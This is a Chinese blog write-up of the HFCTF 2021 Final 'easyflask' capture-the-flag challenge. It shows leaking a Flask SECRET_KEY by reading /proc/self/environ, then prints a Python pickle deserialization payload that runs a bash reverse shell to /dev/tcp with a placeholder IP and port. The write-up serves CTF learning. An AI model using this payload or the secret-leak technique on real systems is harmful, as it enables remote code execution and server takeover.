[HFCTF 2021 Final]easyflask

最新推荐文章于 2023-07-06 17:11:55 发布
最新推荐文章于 2023-07-06 17:11:55 发布
阅读量5.2k 收藏 2
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/116273775
版权

最近看到buu上了几个新题拿一个做做
按照提示得到源码
在这里插入图片描述
有个SECRET_KEY

在这里插入图片描述
还有个文件读取,这边禁用了黑名单,用绝对路径直接读/proc/self/environ试试

在这里插入图片描述
找到秘钥
glzjin22948575858jfjfjufirijidjitg3uiiuuh

继续看源码
在这里插入图片描述
下面有个反序列化的操作,思路不难了,pickle反序列化RCE

最好全程都在liunx环境下进行

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 1,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'",))

})
u = pickle.dumps(User())
print(b64encode(u).decode())
penson by 小乌
关注
专栏目录
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1664
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
CTF 湖湘杯 决赛 2021 final.zip
12-07
【CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
petalinux-v2021.2-final-installer.zip-3
03-31
自己下载了两天才下载到,上传以便程序员们使用;总共有四个压缩文件,需要合并压缩。
petalinux-v2021.2-final-installer.zip-2
03-31
自己下载了两天才下载到,上传以便程序员们使用;总共有四个压缩文件,需要合并压缩。
Treasury-Climate-Ation-Plan-July-2021-Final.pdf
06-21
Treasury-Climate-Ation-Plan-July-2021-Final.pdf
xilinx-zc706-v2021.1-final.bsp
08-06
最新版本的zynq 2021 BSP
poi-3.10-FINALjar包
09-12
poi-3.10-FINALjar包poi-3.10-FINALjar包poi-3.10-FINALjar包poi-3.10-FINALjar包poi-3.10-FINALjar包poi-3.10-FINALjar包poi-3.10-FINALjar包
buuctf--easyflask
qq_46263951的博客
01-04 891
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
ctfshow_愚人杯WEB之easy_flask
XiaoXiao_RenHe的专栏
04-20 998
ctfshow愚人杯WEB之easy_flask重现步骤,cookie内容调整方法。
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者
09-28 1731
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
[HFCTF 2021] final web复现
最新发布
weixin_63231007的博客
07-06 728
flasksession伪造&pickle反序列化 + Laravel&phar反序列化 + exp()溢出盲注
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 4177
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值